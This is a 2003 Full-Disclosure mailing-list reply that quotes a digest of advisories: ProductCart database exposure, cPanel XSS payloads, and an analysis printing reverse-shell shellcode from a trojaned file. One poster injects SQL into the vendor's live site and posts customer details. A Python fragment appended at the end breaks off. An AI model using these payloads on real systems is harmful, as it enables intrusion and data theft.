From: booger at unixclan.net (security snot)
Subject: Re: Full-Disclosure digest, Vol 1 #933 - 11 msgs

Guys -

Could we please limit the length of included replies on this list, to
something sane? Quoting the entire thread is very annoying.

Thanks.

-----------------------------------------------------------
"Whitehat by day, booger at night - I'm the security snot."
- CISSP / CCNA / A+ Certified - www.unixclan.net/~booger/ -
-----------------------------------------------------------

On Sun, 6 Jul 2003, Markus Nielsen wrote:

> On Sun, 2003-07-06 at 16:00, full-disclosure-request@...ts.netsys.com
> wrote:
> > Send Full-Disclosure mailing list submissions to
> >     full-disclosure@...ts.netsys.com
> >
> > To subscribe or unsubscribe via the World Wide Web, visit
> >     http://lists.netsys.com/mailman/listinfo/full-disclosure
> > or, via email, send a message with subject or body 'help' to
> >     full-disclosure-request@...ts.netsys.com
> >
> > You can reach the person managing the list at
> >     full-disclosure-admin@...ts.netsys.com
> >
> > When replying, please edit your Subject line so it is more specific
> > than "Re: Contents of Full-Disclosure digest..."
> >
> >
> > Today's Topics:
> >
> >    1. [Vulnerability] : ProductCart database file can be downloaded remotely (Tri Huynh)
> >    2. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (gyrniff)
> >    3. Re: [Vulnerability] : ProductCart database file
> >        can be downloaded remotely (KF)
> >    4. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (morning_wood)
> >    5. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
> >    6. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
> >    7. Re: tripbid secure codes (Dave Korn)
> >    8. Re: [Vulnerability] : ProductCart database file
> >        can be downloaded remotely (Larry W. Cashdollar)
> >    9. Re: Microsoft Cries Wolf ( again ) (Kristian Hermansen)
> >
> > --__--__--
> >
> > Message: 1
> > From: "Tri Huynh" <trihuynh@...up.com>
> > To: <bugtraq@...urityfocus.com>
> > Cc: <full-disclosure@...ts.netsys.com>
> > Date: Sat, 5 Jul 2003 13:07:51 -0700
> > Subject: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> >
> > ProductCart database file can be downloaded remotely
> > =================================================
> >
> > PROGRAM: ProductCart
> > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > VULNERABLE VERSIONS: 1.0 to 2.0
> > RISK: High
> >
> >
> > DESCRIPTION
> > =================================================
> >
> > ProductCart® is an ASP shopping cart that combines sophisticated
> > ecommerce features with time-saving store management tools and remarkable
> > ease of use. It is widely used by many e-commerce sites.
> >
> > DETAILS
> > =================================================
> >
> > In the default installation, product cart database file is located at
> > /productcart/database/EIPC.mdb which can be accessed easily
> > by any remote attackers.
> >
> > Sample: http://victimhost/productcart/database/EIPC.mdb
> >
> > The database file includes the store administration password as well as
> > customer's info (including credit card info).
> >
> >
> > WORKAROUND
> > =================================================
> >
> > Rename the database file, put it in a protected directory.
> >
> >
> > CREDITS
> > =================================================
> >
> > Discovered by Tri Huynh from Sentry Union
> >
> >
> > DISLAIMER
> > =================================================
> >
> > The information within this paper may change without notice. Use of
> > this information constitutes acceptance for use in an AS IS condition.
> > There are NO warranties with regard to this information. In no event
> > shall the author be liable for any damages whatsoever arising out of
> > or in connection with the use or spread of this information. Any use
> > of this information is at the user's own risk.
> >
> >
> > FEEDBACK
> > =================================================
> >
> > Please send suggestions, updates, and comments to: trihuynh@...up.com
> >
> >
> > --__--__--
> >
> > Message: 2
> > From: gyrniff <b240503@...niff.dk>
> > To: full-disclosure@...ts.netsys.com
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> > Date: Sat, 5 Jul 2003 19:37:41 +0200
> >
> > URL:
> > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > Change the name Paul to Paul'
> >
> > Microsoft OLE DB Provider for ODBC Drivers
> >  error '80040e14'
> > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> >
> > have a nice weekend ;-)
> >
> > On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > ProductCart database file can be downloaded remotely
> > > =================================================
> > >
> > > PROGRAM: ProductCart
> > > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > VULNERABLE VERSIONS: 1.0 to 2.0
> > > RISK: High
> > >
> > >
> > > DESCRIPTION
> > > =================================================
> > >
> > > ProductCart? is an ASP shopping cart that combines sophisticated
> > > ecommerce features with time-saving store management tools and remarkable
> > > ease of use. It is widely used by many e-commerce sites.
> > >
> > > DETAILS
> > > =================================================
> > >
> > > In the default installation, product cart database file is located at
> > > /productcart/database/EIPC.mdb which can be accessed easily
> > > by any remote attackers.
> > >
> > > Sample: http://victimhost/productcart/database/EIPC.mdb
> > >
> > > The database file includes the store administration password as well as
> > > customer's info (including credit card info).
> > >
> > >
> > > WORKAROUND
> > > =================================================
> > >
> > > Rename the database file, put it in a protected directory.
> > >
> > >
> > > CREDITS
> > > =================================================
> > >
> > > Discovered by Tri Huynh from Sentry Union
> > >
> > >
> > > DISLAIMER
> > > =================================================
> > >
> > > The information within this paper may change without notice. Use of
> > > this information constitutes acceptance for use in an AS IS condition.
> > > There are NO warranties with regard to this information. In no event
> > > shall the author be liable for any damages whatsoever arising out of
> > > or in connection with the use or spread of this information. Any use
> > > of this information is at the user's own risk.
> > >
> > >
> > > FEEDBACK
> > > =================================================
> > >
> > > Please send suggestions, updates, and comments to: trihuynh@...up.com
> >
> >
> > --__--__--
> >
> > Message: 3
> > Date: Sat, 05 Jul 2003 15:30:28 -0400
> > From: KF <dotslash@...soft.com>
> > To: gyrniff <b240503@...niff.dk>
> > CC: full-disclosure@...ts.netsys.com
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file
> >  can be downloaded remotely
> >
> > Was that legit California data? I am sure than making someone have a
> > nice weekend you just made multiple someones have a shitty month ahead
> > of them...
> > http://www.theregister.co.uk/content/55/31509.html
> >
> > -KF
> >
> > gyrniff wrote:
> >
> > >URL:
> > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > >Change the name Paul to Paul'
> > >
> > >Microsoft OLE DB Provider for ODBC Drivers
> > > error '80040e14'
> > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > >address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> > >
> > >have a nice weekend ;-)
> > >
> > >On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > >
> > >
> > >>ProductCart database file can be downloaded remotely
> > >>=================================================
> > >>
> > >>PROGRAM: ProductCart
> > >>HOMEPAGE: http://www.earlyimpact.com/productcart/
> > >>VULNERABLE VERSIONS: 1.0 to 2.0
> > >>RISK: High
> > >>
> > >>
> > >>DESCRIPTION
> > >>=================================================
> > >>
> > >>ProductCart? is an ASP shopping cart that combines sophisticated
> > >>ecommerce features with time-saving store management tools and remarkable
> > >>ease of use. It is widely used by many e-commerce sites.
> > >>
> > >>DETAILS
> > >>=================================================
> > >>
> > >>In the default installation, product cart database file is located at
> > >>/productcart/database/EIPC.mdb which can be accessed easily
> > >>by any remote attackers.
> > >>
> > >>Sample: http://victimhost/productcart/database/EIPC.mdb
> > >>
> > >>The database file includes the store administration password as well as
> > >>customer's info (including credit card info).
> > >>
> > >>
> > >> WORKAROUND
> > >>=================================================
> > >>
> > >>Rename the database file, put it in a protected directory.
> > >>
> > >>
> > >>CREDITS
> > >>=================================================
> > >>
> > >>Discovered by Tri Huynh from Sentry Union
> > >>
> > >>
> > >>DISLAIMER
> > >>=================================================
> > >>
> > >>The information within this paper may change without notice. Use of
> > >>this information constitutes acceptance for use in an AS IS condition.
> > >>There are NO warranties with regard to this information. In no event
> > >>shall the author be liable for any damages whatsoever arising out of
> > >>or in connection with the use or spread of this information. Any use
> > >>of this information is at the user's own risk.
> > >>
> > >>
> > >>FEEDBACK
> > >>=================================================
> > >>
> > >>Please send suggestions, updates, and comments to: trihuynh@...up.com
> > >>
> > >>
> > >
> > >_______________________________________________
> > >Full-Disclosure - We believe in it.
> > >Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> > >
> >
> >
> > --__--__--
> >
> > Message: 4
> > From: "morning_wood" <se_cur_ity@...mail.com>
> > To: "gyrniff" <b240503@...niff.dk>, <full-disclosure@...ts.netsys.com>
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> > Date: Sat, 5 Jul 2003 15:24:46 -0700
> >
> > vuln to XSS too..
> >
> > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/manageCategories.asp
> >
> > ----- Original Message -----
> > From: "gyrniff" <b240503@...niff.dk>
> > To: <full-disclosure@...ts.netsys.com>
> > Sent: Saturday, July 05, 2003 10:37 AM
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database
> > file can be downloaded remotely
> >
> >
> > > URL:
> > >
> > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > > Change the name Paul to Paul'
> > >
> > > Microsoft OLE DB Provider for ODBC Drivers
> > >  error '80040e14'
> > > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing
> > operator) in
> > > query expression ''Paul'',lastName='Smith',customerCompany='Early
> > Impact',
> > > address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE
> > idCustomer=115'.
> > > /productcart/build_to_order/productcart/pcadmin/processOrder.asp,
> > line 36
> > >
> > > have a nice weekend ;-)
> > >
> > > On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > > ProductCart database file can be downloaded remotely
> > > > =================================================
> > > >
> > > > PROGRAM: ProductCart
> > > > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > > VULNERABLE VERSIONS: 1.0 to 2.0
> > > > RISK: High
> > > >
> > > >
> > > > DESCRIPTION
> > > > =================================================
> > > >
> > > > ProductCart? is an ASP shopping cart that combines sophisticated
> > > > ecommerce features with time-saving store management tools and
> > remarkable
> > > > ease of use. It is widely used by many e-commerce sites.
> > > >
> > > > DETAILS
> > > > =================================================
> > > >
> > > > In the default installation, product cart database file is located
> > at
> > > > /productcart/database/EIPC.mdb which can be accessed easily
> > > > by any remote attackers.
> > > >
> > > > Sample: http://victimhost/productcart/database/EIPC.mdb
> > > >
> > > > The database file includes the store administration password as
> > well as
> > > > customer's info (including credit card info).
> > > >
> > > >
> > > > WORKAROUND
> > > > =================================================
> > > >
> > > > Rename the database file, put it in a protected directory.
> > > >
> > > >
> > > > CREDITS
> > > > =================================================
> > > >
> > > > Discovered by Tri Huynh from Sentry Union
> > > >
> > > >
> > > > DISLAIMER
> > > > =================================================
> > > >
> > > > The information within this paper may change without notice. Use
> > of
> > > > this information constitutes acceptance for use in an AS IS
> > condition.
> > > > There are NO warranties with regard to this information. In no
> > event
> > > > shall the author be liable for any damages whatsoever arising out
> > of
> > > > or in connection with the use or spread of this information. Any
> > use
> > > > of this information is at the user's own risk.
> > > >
> > > >
> > > > FEEDBACK
> > > > =================================================
> > > >
> > > > Please send suggestions, updates, and comments to:
> > trihuynh@...up.com
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> >
> > --__--__--
> >
> > Message: 5
> > From: Ory Segal <ORY.SEGAL@...CTUMINC.COM>
> > To: "BugTraq (E-mail)" <BUGTRAQ@...URITYFOCUS.COM>,
> >     "Full Disclosure (E-mail)" <full-disclosure@...ts.netsys.com>,
> >     "WebAppSec (E-mail)" <webappsec@...URITYFOCUS.COM>
> > Date: Sun, 6 Jul 2003 01:39:33 -0700
> > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability
> >
> > ////////////////////////////////////////////////////////////////////////////
> > ///
> > //==========================>> Security Advisory
> > <<==========================//
> > ////////////////////////////////////////////////////////////////////////////
> > ///
> >
> > ----------------------------------------------------------------------------
> > ---
> > -----[ cPanel Malicious HTML Tags Injection Vulnerability
> > ----------------------------------------------------------------------------
> > ---
> >
> > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com
> > --[ Discovery Date: 06/17/2003 (Vendor was notified)
> > --[ Release Date: 07/06/2003
> > --[ Product: Tested on cPanel 6.4.2-STABLE
> > --[ Severity: Medium
> > --[ CVE: Not assigned yet
> >
> > --[ Summary
> >
> > From the vendor's web site:
> > "...The Cpanel interface is a client side interface, which allows your
> > customers
> > to easily control a web hosting account. With the touch of a button, they
> > can
> > add e-mail accounts, access their files, backup their files, setup a
> > shopping
> > cart, and more..."
> >
> > Web users can embed Malicious HTML tags in HTTP requests, which will later
> > be parsed by the web site administrator's browser, in several cPanel
> > screens.
> > This may lead to theft of cookies associated with the domain, or execution
> > of
> > client-side scripts in the administrator's browser.
> >
> > --[ Description
> >
> > The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web
> > site
> > administrator with HTTP request logs. These scripts do not sanitize the URL
> > part
> > of HTTP requests and present them to the administrator as is, thus, allowing
> > an
> > attacker to embed malicious HTML tags that will later be parsed and executed
> > by
> > the administrators browser.
> >
> > For example, lets take a look at the 'Error Log' screen:
> >
> > [From errlog.html]
> > ...
> > <b>Last 300 Error Log Messages in reverse order:</b><hr>
> > <pre>
> > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
> > /home/dir/public_html/foobar.html
> > </pre>
> > ...
> >
> > The following request will present a pop-up screen with the cookies
> > that are currently associated with the domain:
> >
> >     GET /<script>alert(document.cookie);</script> HTTP/1.0
> >     Host: www.site.com
> >
> >
> > --[ Note
> >
> > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented
> > the
> > latest requests as HTML links, thus the malicious payload must terminate the
> > <a>
> > tag before opening a new one. For example:
> >
> >     GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
> >     Host: www.site.com
> >
> > --[ Solution
> >
> > According to the vendor, the problem was fixed in version 7.0, which can be
> > downloaded at: http://www.cpanel.net/downloads.htm
> >
> >
> >
> >
> > Ory Segal
> > Senior Security Engineer
> > Sanctum, Inc.
> > http://www.SanctumInc.Com/
> >
> > Ampa Bldg., 1 Sapir Street.
> > Mail: P.O.Box 12047
> > Herzliya 46733, ISRAEL
> >
> > Tel: +972-9-9586077 Ext. 236
> > Fax: +972-9-9576337
> >
> > --__--__--
> >
> > Message: 6
> > Date: Sun, 06 Jul 2003 11:46:44 +0300
> > From: Ory Segal <ory.segal@...ctuminc.com>
> > To: BUGTRAQ@...URITYFOCUS.COM, full-disclosure@...ts.netsys.com,
> >  webappsec@...URITYFOCUS.COM
> > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability
> >
> > -------------------------------------------------------------------------------
> > -----[ cPanel Malicious HTML Tags Injection Vulnerability
> > -------------------------------------------------------------------------------
> >
> > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com
> > --[ Discovery Date: 06/17/2003 (Vendor was notified)
> > --[ Release Date: 07/06/2003
> > --[ Product: Tested on cPanel 6.4.2-STABLE
> > --[ Severity: Medium
> > --[ CVE: Not assigned yet
> >
> > --[ Summary
> >
> > From the vendor's web site:
> > "...The Cpanel interface is a client side interface, which allows your
> > customers
> > to easily control a web hosting account. With the touch of a button,
> > they can
> > add e-mail accounts, access their files, backup their files, setup a
> > shopping
> > cart, and more..."
> >
> > Web users can embed Malicious HTML tags in HTTP requests, which will later
> > be parsed by the web site administrator's browser, in several cPanel
> > screens.
> > This may lead to theft of cookies associated with the domain, or
> > execution of
> > client-side scripts in the administrator's browser.
> >
> > --[ Description
> >
> > The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web
> > site
> > administrator with HTTP request logs. These scripts do not sanitize the
> > URL part
> > of HTTP requests and present them to the administrator as is, thus,
> > allowing an
> > attacker to embed malicious HTML tags that will later be parsed and
> > executed by
> > the administrators browser.
> >
> > For example, lets take a look at the 'Error Log' screen:
> >
> > [From errlog.html]
> > ...
> > <b>Last 300 Error Log Messages in reverse order:</b><hr>
> > <pre>
> > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
> > /home/dir/public_html/foobar.html
> > </pre>
> > ...
> >
> > The following request will present a pop-up screen with the cookies
> > that are currently associated with the domain:
> >
> > GET /<script>alert(document.cookie);</script> HTTP/1.0
> > Host: www.site.com
> >
> >
> > --[ Note
> >
> > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE)
> > presented the latest requests as HTML links, thus the malicious payload
> > must terminate the <a> tag before opening a new one. For example:
> >
> > GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
> > Host: www.site.com
> >
> > --[ Solution
> >
> > According to the vendor, the problem was fixed in version 7.0, which can be
> > downloaded at: http://www.cpanel.net/downloads.htm
> >
> >
> > --__--__--
> >
> > Message: 7
> > From: "Dave Korn" <davek_throwaway@...mail.com>
> > To: full-disclosure@...ts.netsys.com
> > Subject: Re: [Full-Disclosure] tripbid secure codes
> > Date: Sun, 06 Jul 2003 12:23:01 +0000
> >
> >
> > ----- Original Message -----
> > From: <auto94042@...hmail.com>
> > To: <full-disclosure@...ts.netsys.com>
> > Sent: Friday, June 27, 2003 6:25 AM
> > Subject: [Full-Disclosure] tripbid secure codes
> >
> >
> > >i post the thing to the vuln dev some days ago and get quite a big
> > >response.
> > >not only do i get a heart 2 heat with n1xo reiman about portmon ! but
> > >some folks want me to look at the code they make, specially a
> > >'hello-world.c' progie -> " holo, can you check my hello-world.c for
> > >strcpy ?? securecode do the trick " <- paraphrase the msg, i rm -rf /
> > >it since it make me anger and stress it !
> > >
> > >i am willing to try the secure code since the grep 'strcpy' is losing
> > >his thrills so i trick around with :
> > >[user@...alhost]$ ./securecode -s hello-world.c
> > >
> > >
> > Never ever EVER run an insecure program over arbitrary data you receive from
> > the net without checking it for safety first..... Let's look at this
> > hello-world.c before we run anything on it....
> >
> >
> > Z:\sploits-misc\targzip>type hello-world.c
> >
> >
> > Heh. Boy, did j00 get hax0red! Here's what's actually in that file:
> >
> > $0000 - $00ff: 'A' x 256
> > $0100 - $011f: DWORD $bffff321 x 8
> > $0120 - $0378 $90 = NOP x 600
> > $0378 - $03fa: Binary shellcode
> > $03fb - $03fc: CR, LF
> > <EOF>
> >
> > In other words, it's one very long line. Looks to me like the securecode
> > program reads each line of the .c file into a buffer that's only 256 bytes
> > long; this exploit fills it with 'A', then overwrites the return address on
> > the stack with a pointer into the NOP slide. Here's a disassembly of the
> > shellcode: note that offset 0 in this disassembly is offset $0370 in the
> > file. Sorry for not commenting this, but I don't speak linux asm; however I
> > can see a whole bunch of syscalls going on in there; the values in eax
> > should tell you whether anything nastier than a few mkdirs was done to
> > you...
> >
> > Z:\sploits-misc\targzip>objdump -D --target=binary hello-world2.bin --architecture=i386
> >
> > hello-world2.bin: file format binary
> >
> > objdump: hello-world2.bin: no symbols
> > Disassembly of section .data:
> >
> > 00000000 <.data>:
> >    0:   90                   nop
> >    1:   90                   nop
> >    2:   90                   nop
> >    3:   90                   nop
> >    4:   90                   nop
> >    5:   90                   nop
> >    6:   90                   nop
> >    7:   90                   nop
> >    8:   90                   nop
> >    9:   31 c0                xor    %eax,%eax
> >    b:   31 db                xor    %ebx,%ebx
> >    d:   31 c9                xor    %ecx,%ecx
> >    f:   51                   push   %ecx
> >   10:   b1 06                mov    $0x6,%cl
> >   12:   51                   push   %ecx
> >   13:   b1 01                mov    $0x1,%cl
> >   15:   51                   push   %ecx
> >   16:   b1 02                mov    $0x2,%cl
> >   18:   51                   push   %ecx
> >   19:   89 e1                mov    %esp,%ecx
> >   1b:   b3 01                mov    $0x1,%bl
> >   1d:   b0 66                mov    $0x66,%al
> >   1f:   cd 80                int    $0x80
> >   21:   89 c2                mov    %eax,%edx
> >   23:   31 c0                xor    %eax,%eax
> >   25:   31 c9                xor    %ecx,%ecx
> >   27:   51                   push   %ecx
> >   28:   51                   push   %ecx
> >   29:   68 d4 62 f7 cc       push   $0xccf762d4
> >   2e:   66 68 b0 ef          pushw  $0xefb0
> >   32:   b1 02                mov    $0x2,%cl
> >   34:   66 51                push   %cx
> >   36:   89 e7                mov    %esp,%edi
> >   38:   b3 10                mov    $0x10,%bl
> >   3a:   53                   push   %ebx
> >   3b:   57                   push   %edi
> >   3c:   52                   push   %edx
> >   3d:   89 e1                mov    %esp,%ecx
> >   3f:   b3 03                mov    $0x3,%bl
> >   41:   b0 66                mov    $0x66,%al
> >   43:   cd 80                int    $0x80
> >   45:   31 c9                xor    %ecx,%ecx
> >   47:   39 c1                cmp    %eax,%ecx
> >   49:   74 06                je     0x51
> >   4b:   31 c0                xor    %eax,%eax
> >   4d:   b0 01                mov    $0x1,%al
> >   4f:   cd 80                int    $0x80
> >   51:   31 c0                xor    %eax,%eax
> >   53:   b0 3f                mov    $0x3f,%al
> >   55:   89 d3                mov    %edx,%ebx
> >   57:   cd 80                int    $0x80
> >   59:   31 c0                xor    %eax,%eax
> >   5b:   b0 3f                mov    $0x3f,%al
> >   5d:   89 d3                mov    %edx,%ebx
> >   5f:   b1 01                mov    $0x1,%cl
> >   61:   cd 80                int    $0x80
> >   63:   31 c0                xor    %eax,%eax
> >   65:   b0 3f                mov    $0x3f,%al
> >   67:   89 d3                mov    %edx,%ebx
> >   69:   b1 02                mov    $0x2,%cl
> >   6b:   cd 80                int    $0x80
> >   6d:   31 c0                xor    %eax,%eax
> >   6f:   31 d2                xor    %edx,%edx
> >   71:   50                   push   %eax
> >   72:   68 6e 2f 73 68       push   $0x68732f6e
> >   77:   68 2f 2f 62 69       push   $0x69622f2f
> >   7c:   89 e3                mov    %esp,%ebx
> >   7e:   50                   push   %eax
> >   7f:   53                   push   %ebx
> >   80:   89 e1                mov    %esp,%ecx
> >   82:   b0 0b                mov    $0xb,%al
> >   84:   cd 80                int    $0x80
> >   86:   31 c0                xor    %eax,%eax
> >   88:   b0 01                mov    $0x1,%al
> >   8a:   cd 80                int    $0x80
> >   8c:   0d                   .byte 0xd
> >   8d:   0a                   .byte 0xa
> >
> >
> > DaveK
> >
> > _________________________________________________________________
> > Sign-up for a FREE BT Broadband connection today!
> > http://www.msn.co.uk/specials/btbroadband
> >
> >
> > --__--__--
> >
> > Message: 8
> > Date: Sun, 6 Jul 2003 11:07:22 -0400 (EDT)
> > From: "Larry W. Cashdollar" <lwc@...id.ath.cx>
> > To: <full-disclosure@...ts.netsys.com>
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file
> > can be downloaded remotely
> >
> >
> > 949 is a legit zip code in cali.
> >
> >
> > On Sat, 5 Jul 2003, KF wrote:
> >
> > > Was that legit California data? I am sure than making someone have a
> > > nice weekend you just made multiple someones have a shitty month ahead
> > > of them...
> > > http://www.theregister.co.uk/content/55/31509.html
> > >
> > > -KF
> > >
> > > gyrniff wrote:
> > >
> > > >URL:
> > > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > > >Change the name Paul to Paul'
> > > >
> > > >Microsoft OLE DB Provider for ODBC Drivers
> > > > error '80040e14'
> > > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > > >address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> > > >
> > > >have a nice weekend ;-)
> > > >
> > > >On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > >
> > > >
> > > >>ProductCart database file can be downloaded remotely
> > > >>=================================================
> > > >>
> > > >>PROGRAM: ProductCart
> > > >>HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > >>VULNERABLE VERSIONS: 1.0 to 2.0
> > > >>RISK: High
> > > >>
> > > >>
> > > >>DESCRIPTION
> > > >>=================================================
> > > >>
> > > >>ProductCart is an ASP shopping cart that combines sophisticated
> > > >>ecommerce features with time-saving store management tools and remarkable
> > > >>ease of use. It is widely used by many e-commerce sites.
> > > >>
> > > >>DETAILS
> > > >>=================================================
> > > >>
> > > >>In the default installation, product cart database file is located at
> > > >>/productcart/database/EIPC.mdb which can be accessed easily
> > > >>by any remote attackers.
> > > >>
> > > >>Sample: http://victimhost/productcart/database/EIPC.mdb
> > > >>
> > > >>The database file includes the store administration password as well as
> > > >>customer's info (including credit card info).
> > > >>
> > > >>
> > > >> WORKAROUND
> > > >>=================================================
> > > >>
> > > >>Rename the database file, put it in a protected directory.
> > > >>
> > > >>
> > > >>CREDITS
> > > >>=================================================
> > > >>
> > > >>Discovered by Tri Huynh from Sentry Union
> > > >>
> > > >>
> > > >>DISCLAIMER
> > > >>=================================================
> > > >>
> > > >>The information within this paper may change without notice. Use of
> > > >>this information constitutes acceptance for use in an AS IS condition.
> > > >>There are NO warranties with regard to this information. In no event
> > > >>shall the author be liable for any damages whatsoever arising out of
> > > >>or in connection with the use or spread of this information. Any use
> > > >>of this information is at the user's own risk.
> > > >>
> > > >>
> > > >>FEEDBACK
> > > >>=================================================
> > > >>
> > > >>Please send suggestions, updates, and comments to: trihuynh@...up.com
> > > >>
> > > >>
> > > >
> > > >_______________________________________________
> > > >Full-Disclosure - We believe in it.
> > > >Charter: http://lists.netsys.com/full-disclosure-charter.html
> > > >
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> >
> >
> > --__--__--
> >
> > Message: 9
> > From: "Kristian Hermansen" <this_is_kris@...mail.com>
> > To: <full-disclosure@...ts.netsys.com>
> > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again )
> > Date: Tue, 1 Jul 2003 22:49:59 -0400
> >
> > Yes, programmers should be trained to write better code...but it is more
> > profitable to allow sloppy code and a simple fix later (behind the scenes
> > with vendor notification). This is MS point-of-view. This is why they want
> > vendor notification, rather than public notification. Again, I say let the
> > 0-days fly.
> >
> > Did you know that certain US government agencies have teams that their only
> > job is to break software? This has been going on since the 1970's. It
> > helps to produce secure code in mission critical applications that the
> > military needs. I am not saying that MS needs to be SO drastic...but a
> > small team for their MOST popular products would sure be wise to start with.
> > Why not hire fucking intern teenagers from russia to "Crash Test" their
> > development projects (facetious)? Would it be so difficult/expensive to
> > hire some of the main companies that are breaking your software???
> >
> > Kris Hermansen
> >
> > ----- Original Message -----
> > From: "Schmehl, Paul L" <pauls@...allas.edu>
> > To: <full-disclosure@...ts.netsys.com>
> > Sent: Tuesday, July 01, 2003 6:58 PM
> > Subject: RE: [Full-Disclosure] Microsoft Cries Wolf ( again )
> >
> >
> > > > -----Original Message-----
> > > > From: Kristian Hermansen [mailto:this_is_kris@...mail.com]
> > > > Sent: Tuesday, July 01, 2003 3:09 PM
> > > > To: full-disclosure@...ts.netsys.com
> > > > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again )
> > > >
> > > >
> > > > I agree. It is not our problem. The reason is this.
> > > > Microsoft would like to reduce costs. Fixing bugs in
> > > > products costs money, and 0-day bugs need immediate fixes
> > > > which slow down MS total output ability. They would like to
> > > > see everyone reporting to the vendor first because this saves
> > > > them money!!! In this respect, this also allows them to go on
> > > > writing sloppy code in order to save a few bucks on every
> > > > product, thus reducing their overhead. I don't want sloppy
> > > > code. Let the 0-days fly....maybe MS will start doing
> > > > extensive testing to their products before they release it
> > > > for sale to millions of customers. I thought .NET was
> > > > supposed to fix all this ;-P
> > >
> > > That's too funny. Microsoft ran a "buffer overflow finder" against the
> > > codebase for XP, and the VP in charge announced publicly that they had
> > > "eliminated buffer overflows in XP". Within thirty days, eEye announced
> > > the UPnP vulnerability in SSDP, which is the single most devastating
> > > hole ever found in MS products. (You can compromise an entire network
> > > of XP machines with one attack, simultaneously.)
> > >
> > > You don't fix code by extensive testing. You fix it by teaching how to
> > > write secure code to begin with *and* by ongoing, consistent audits done
> > > before code is released. (OpenBSD has been doing this for years, and
> > > look at the results.)
> > >
> > > Paul Schmehl (pauls@...allas.edu)
> > > Adjunct Information Security Officer
> > > The University of Texas at Dallas
> > > AVIEN Founding Member
> > > http://www.utdallas.edu/~pauls/
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> >
> >
> > --__--__--
> >
> > _______________________________________________
> > Full-Disclosure mailing list
> > Full-Disclosure@...ts.netsys.com
> > http://lists.netsys.com/mailman/listinfo/full-disclosure
> >
> >
> > End of Full-Disclosure Digest
> --
> Markus Nielsen <intercool@...magnet.com>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
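The cPanel advisory quoted above traces the bug to the 'Error Log' and 'Latest Visitors' screens writing the request URL into the page unencoded. The following is an added example, not cPanel's code and not part of the thread: it shows the described behaviour beside output encoding for the `<pre>` body and for the `<a href>` attribute, with function names and the log-line template as assumptions.

```python
import html
from urllib.parse import quote

# Constructed inputs: the two request paths shown in the advisory.
ERRLOG_PATH = "/<script>alert(document.cookie);</script>"
VISITOR_PATH = '/"></a><script>alert(document.cookie);</script>'


def error_log_line(path):
    """Constructed log line in the format of the errlog.html excerpt."""
    return ("[Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] "
            "File does not exist: /home/dir/public_html" + path)


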